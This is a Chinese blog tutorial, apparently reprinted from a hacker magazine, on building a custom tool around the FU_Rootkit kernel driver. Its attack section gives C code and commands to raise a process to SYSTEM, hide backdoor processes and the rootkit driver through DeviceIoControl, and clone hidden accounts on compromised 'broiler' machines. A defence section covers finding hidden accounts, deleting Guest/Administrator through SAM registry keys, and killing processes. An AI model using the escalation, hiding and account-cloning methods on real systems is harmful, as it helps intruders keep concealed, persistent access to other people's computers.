注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

无翼风的网易博客

欢迎光临无翼风的网易博客

 
 
 

日志

 
 

提升进程权限为debug权限,无法禁止进程  

2007-03-30 20:58:22|  分类: 编程与电脑技术 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

在2004年11期黑防上刊登了《小工具巧删Guest/Administrator账户》这篇文章,有不少朋友来信询问工具是如何编写的,其实这个工具里面大部分代码是我拷贝FU_Rootkit过来的。既然朋友们喜欢,这几天我又多了好多想法,那我就来讲讲怎么充分挖掘利用FU_Rootkit吧!
先去www.rootkit.com把FU_Rootkit 给Down下来,以前它在Windows 2000专业版下面提升进程权限有问题,新版本已经修复这个问题。FU_Rootkit也算是“养在深闺人未识”了,比起Hxdef、AFX RootKit来名气小多了,不过是金子终究是要发光的,这不,今天我们就让它来发光了!
FU_Rootkit是开源的,用C语言编写,很容易移植。我的开发环境是Windows 2000+SP4+VC6.0。FU_Rootkit主程序包括2个部分:Fu.exe和Msdirectx.sys。 Msdirectx.sys能直接载入核心内存,Fu.exe则是相应的应用程序。先来看看它的部分功能:
[-pl] xxx 列举所有运行进程
[-ph] #PID 隐藏进程标识符为PID的进程
[-pld] 列举所有载入驱动程序
[-phd] DRIVER_NAME 隐藏指定驱动
[-pas] #PID 提升进程标识符为PID的进程权限至SYSTEM
[-prl] 列出可用的权限名单
[-prs] #PID #privilege_name 提升进程标识符为PID的进程权限至指定权限
[-pss] #PID #account_name 改变进程令牌和SID
可以看出FU_Rootkit不仅可以隐藏进程和驱动,改变进程令牌和SID,还可以例举用Hook技术隐藏的进程和驱动。我们今天要做的就是利用Msdirectx.sys完成我们自己的黑客工具集的编写!
权限提升
有了权限我们才能任意地操作,让电脑为我们实现各种功能,所以第一步首先是权限提升。
我们知道,提升进程权限可以用Psu工具,FU_Rootkit也能够实现这个功能,它可以将任意进程提升到SYSTEM权限——不光可以给其它进程提升权限,还可以把自己的进程也提升为SYSTEM权限哦(在下面的文章中你将可以看到这个功能是多么的有用)!
第一步:载入Msdirectx.sys
具体代码见InitDriver()函数。其实朋友们大可不必完全看懂这些代码,把函数直接拷贝过去就OK了。
第二步:查找进程的PID
代码如下:
const char DESTPROC[19] = "UserManager.exe"; // UserManager.exe是程序的进程名称
AddPrivilege(SE_DEBUG_NAME); //提升进程DEBUG权限
HANDLE hRemoteProcess = NULL;
DWORD pid = ProcessToPID(DESTPROC);//这里的pid就是我们进程PID
// ProcessToPID函数如下:
DWORD ProcessToPID(const char *InputProcessName)
//将进程名转换成进程PID的函数
{
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
HANDLE hProcess = NULL;
HMODULE hMod = NULL;
char szProcessName[MAX_PATH] = "UnknownProcess";
//提升进程权限至DEBUG权限
AddPrivilege(SE_DEBUG_NAME);
// 计算目前有多少进程, aProcesses[]用来存放有效的进程PIDs
if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
{
return 0;
}
cProcesses = cbNeeded / sizeof(DWORD);
// 按有效的PID遍历所有的进程
for ( i = 0; i < cProcesses; i++ )
{
// 打开特定PID的进程
hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, aProcesses[i]);
// 取得特定PID的进程名
if ( hProcess )
{
if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
{
GetModuleBaseName( hProcess, hMod, szProcessName, sizeof(szProcessName) );
//将取得的进程名与输入的进程名比较,如相同则返回进程PID
if(!stricmp(szProcessName, InputProcessName))
{
CloseHandle( hProcess );
return aProcesses[i];
}
}
}//end of if ( hProcess )
}//end of for
//没有找到相应的进程名,返回0
CloseHandle( hProcess );
return 0;
}
第三步:提升进程权限至SYSTEM
具体代码见UpdateToSystem()函数。这样我们的进程UserManager.exe就具备了SYSTEM权限了。
攻击篇
当你得到肉鸡的SYSTEM权限后,当然要把自己的后门进程或驱动器隐藏,然后克隆账号,留个隐藏账号什么的,下面我们就来看看这些功能如何用程序来实现。
1.克隆帐号
各位朋友看到小榕的CA工具是不是很眼馋,想不想自己写一个?在黑防2003年的第7期《C语言克隆账号》上已经有具体介绍。一般来讲,克隆账号的方法有2种:一种是利用系统服务的SYSTEM权限读写SAM文件;第二种是利用驱动提升进程权限。我们这里采用第二种办法。在《C语言克隆账号》一文中,由于其不具备SYSTEM权限,需要手工修改注册表才能够操作注册表SAM文件夹,比较麻烦。在我们这里当然是没有问题的,将其代码COPY过来,粘在我们工程里面就可以了。
2.进程隐藏
进程隐藏实乃木马病毒的必备防身本领,FU_Rootkit中的最基本功能之一就是进程隐藏,首先我们要知道进程的PID或者进程名,然后才能将它隐藏,隐藏代码如下:
DWORD HideProc(DWORD pid)//pid是你要隐藏的进程的PID
{
DWORD d_bytesRead;
DWORD success;
if (!Initialized)
{
return ERROR_NOT_READY;
}
success = DeviceIoControl(gh_Device,
IOCTL_ROOTKIT_HIDEME,
(void *) &pid,
sizeof(DWORD),
NULL,
0,
&d_bytesRead,
NULL);
return success;
}
假如你要想找出隐藏的进程,可以采用工具RTDector0.62工具,黑防以前就介绍过。
3. 驱动隐藏
驱动隐藏?很少见吧。有经验的管理员一般都会使用命令Drivers.exe来查看载入的驱动(Drivers.exe可以在Windows 2000的资源包里面找到),
看到Msdirectx.sys暴露出来了吧?而FU_Rootkit就可以把自己的 Msdirectx.sys隐藏起来,运行的命令是:“C:\fu.exe –phd msdirectx.sys”。当然这个功能我们也可以很轻松地移植到我们的程序中去。

防御篇
千万不要以为FU_Rootkit得到SYSTEM权限只是用来攻击,不能防守,其实Rootkit是一把“双刃剑”,运用得当,同样是防御的好帮手。同时,作为一名菜鸟,当然是防守为先,所以请看防守篇。
1. 系统用户查看
眼下只要翻开一本黑客杂志,经常看到什么“隐藏帐号”、“不死帐号”什么的,吓得我等菜鸟心惊胆颤,经常对着用户管理发呆,究竟有没有问题呢?这里我们可以利用LPUSER_INFO_3读取用户信息,包括用户名、用户全名、用户描述、登录次数、登录权限以及上次登录时间等参数,代码较长而且简单,这里就不贴了,有兴趣的可以查看DWORD CUserManagerDlg::UserALLE()函数。
当然,列举账号可以直接从SAM\\SAM\\Domains\\Account\\Users\\Names\中读取,然后与LPUSER_INFO_3中读出来的账号进行对比,这样就能找出隐藏的账号,将那些隐藏的、不死的统统打回原形,让你把账号看得“清清楚楚,明明白白”。
2. 删除Guest
先来看看如何删除Guest用户吧。获取SYSTEM权限后,只要删除在注册表SAM文件夹中对应的Guest和000001F5文件夹就OK了!
void CUserManagerDlg::Deleteguest()
{
BOOL upResult;
upResult=UpdateToSystem();
//先查看一下进程提示权限至SYSTEM成功没有
if(upResult)//如果权限提升SYSTEM成功的话
{
// 删除GUEST用户!
BOOL dResult;
dResult=DelNT(HKEY_LOCAL_MACHINE,"SAM\\SAM\\Domains\\Account\\Users\\Names\\Guest");//删除Guest文件夹
BOOL dResult2;
dResult2=DelNT(HKEY_LOCAL_MACHINE,"SAM\\SAM\\Domains\\Account\\Users\\000001F5");//删除guest对应的ID号000001F5文件夹
if(dResult&&dResult2)
{
AfxMessageBox("成功删除GUEST用户!");
}
else
{
AfxMessageBox("删除GUEST用户失败!");
}
}
else
{
AfxMessageBox("提升至SYSTEM权限失败!");
}
}
其中DelNT()函数是专门定义用来删除注册表子键的函数。
3. 删除Administrator
看到标题你可不要吓一跳,Administrator一般情况下是不能删除的,当然你可以到控制面板->管理工具->计算机管理里面重命名该账户,也可以使用NT Resource Kit提供的Passprop工具启用对Administrator的锁定。我们这里当然要挑战极限:删除Administrator!代码跟删除Guest用户的代码差不多,换个参数就可以了,分别删除注册表SAM文件夹中的Administrator和000001F4文件夹就可以了。而且可以在Administrator当前用户下删除,强吧?嘿嘿。假如你只有这么一个管理员账号的话呢,不好意思,恭喜你:你的机器上从此没有管理员了!

小提示:强烈建议删除Administrator之前一定要先创建一个其它名字的管理员账号!据《微软信息安全文集》中说,删除Administrator和Guest系统内置账户有可能导致破坏SAM数据库,不过《微软信息安全文集》的作者同时声明:经他测试,没有发现副作用。

4. 查杀进程篇
朋友们是否经常遇到这种情况:在任务管理器中发现一个未知进程,并且杀不掉,说是权限不够,这个问题在我们获取System权限后就不再是问题,现在病毒、木马等都是双进程,互相监控,给我们查杀进程带来很大不便,需要我们能够同时查杀多个进程。选用Listview控件作为进程的列举控件,将Checkbox选项选中,这样我们就可以同时选中多个进程进行查杀,爽吧?!
5. 列举用Hook技术隐藏的进程和驱动
这个功能就是FU_Rootkit的过人之处了,可以帮助你查找利用HOOK技术隐藏的进程和木马。实现方法比较简单,大家可以去源码中查看ListProc(void *buffer, int buff_size)和ListDriv(void)函数。

本文利用FU_Rootkit获取SYSTEM权限后,完成了很多实用的黑客小工具, System和Administrator权限一般人看起来感觉都差不多,但在一些与系统内核交互的细节上,可以看出System权限要更大一些。譬如说注册表中的某些文件夹、对物理内存有读写能力等方面。因此,获取System权限后所能做的事情远远不止我们上面所说的这些,希望大家共同挖掘。

  评论这张
 
阅读(349)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018